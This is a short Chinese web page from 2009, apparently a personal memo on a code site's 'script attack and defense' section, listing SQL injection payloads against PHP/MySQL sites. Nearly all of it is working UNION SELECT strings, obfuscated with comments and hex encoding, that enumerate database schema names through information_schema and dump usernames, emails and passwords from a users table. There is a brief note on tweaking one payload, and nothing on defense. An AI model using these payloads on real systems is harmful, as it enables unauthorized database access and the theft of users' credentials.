当前位置: 代码网 > 服务器>网络安全>脚本攻防 > php 注入 记录一下

php 注入 记录一下

2009年04月20日 脚本攻防 我要评论
php 注入 记录一下暴库名\表名\列名 /**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch ema.columns+WHERE+... 09-04-20
暴库名\表名\列名

/**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+from+information_sch
ema.columns+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+n,1--

碰到一个字段暴不出来,问了下trace,找到了原因,是因为用户名字段是9个,但是密码字段只有4个是有值的,所以暴不出来,改了下语句可以了.

union+select+count(pasd)+from+users--

+union+select+concat(loginid,0x3a,email,0x3a,pasd)+from+users+where+length(pasd)>0+limit+n,1--

或者冰的原点提供的

/union/**/select/**/unhex(hex(group_concat(loginid,0x3a,pasd)))+from+users--

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com